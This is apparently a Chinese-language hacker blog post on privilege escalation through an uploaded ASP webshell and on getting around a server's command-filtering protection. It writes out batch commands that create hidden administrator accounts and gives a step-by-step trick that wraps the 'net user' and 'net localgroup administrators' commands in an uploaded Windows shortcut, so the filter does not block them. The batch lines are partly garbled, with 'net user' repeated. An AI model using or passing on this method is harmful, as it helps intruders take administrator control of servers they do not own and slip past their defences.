主要寫的是突破提權(quán)的方法，

再次突破變態(tài)限制

    有突破一流信息攔截系統(tǒng)的網(wǎng)站，上傳個馬就不容易，好容易上傳了，還不能執(zhí)行命令，郁悶了..

    執(zhí)行命令提權(quán)的時候因為命令里有 net user 被攔截，

    我KAO，換個思路。

    運行批命令和直接執(zhí)行命令效果是一樣的，它既然不讓執(zhí)行net命令，我運行批命令還不行嗎？

    立刻動手，在asp馬里點[新建文件] 把名字改稱hacker.bat 在內(nèi)容里寫上：

    net usernet user hacker$ /del

    net usernet user hacker$ hacker /add

    net localgroup administrators hacker$ /add

    OK。保存！

    暈！不成功！直接被攔....

    郁悶了一會，又想個辦法：在本地弄個批命令，然后上傳，這攔截系統(tǒng)總不會對文件攔截吧？

    OK。上傳！

    暈！又被攔！...

    難道這家伙真到看文件內(nèi)容？

    那它是怎么看的？

    給服務(wù)器按個OD之類的？

    不大現(xiàn)實...真正的EXE 程序想執(zhí)行命令必然不會把命令原樣保持在程序里的，

    自己寫個程序試試？

    暈！沒工具...又沒經(jīng)驗...

    算了

    回家看電子書...1998-2002的綠盟的文章，好多..

    看到個2000系統(tǒng)輸入法漏洞入侵的文章，在文章結(jié)尾作者提出了幾個問題，后來有高手做了答，

電腦資料

    看到這幾個問題的答案，偶突然有了突破一流信息攔截系統(tǒng)執(zhí)行命令的方法..

    .

    1、準(zhǔn)備提權(quán)命令：cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add

    2、新建快捷方式，在地址欄寫入提權(quán)命令

    3、上傳這個快捷方式

    4、在提權(quán)工具幫助下運行這個快捷方式.....

    5、管理員添加成功....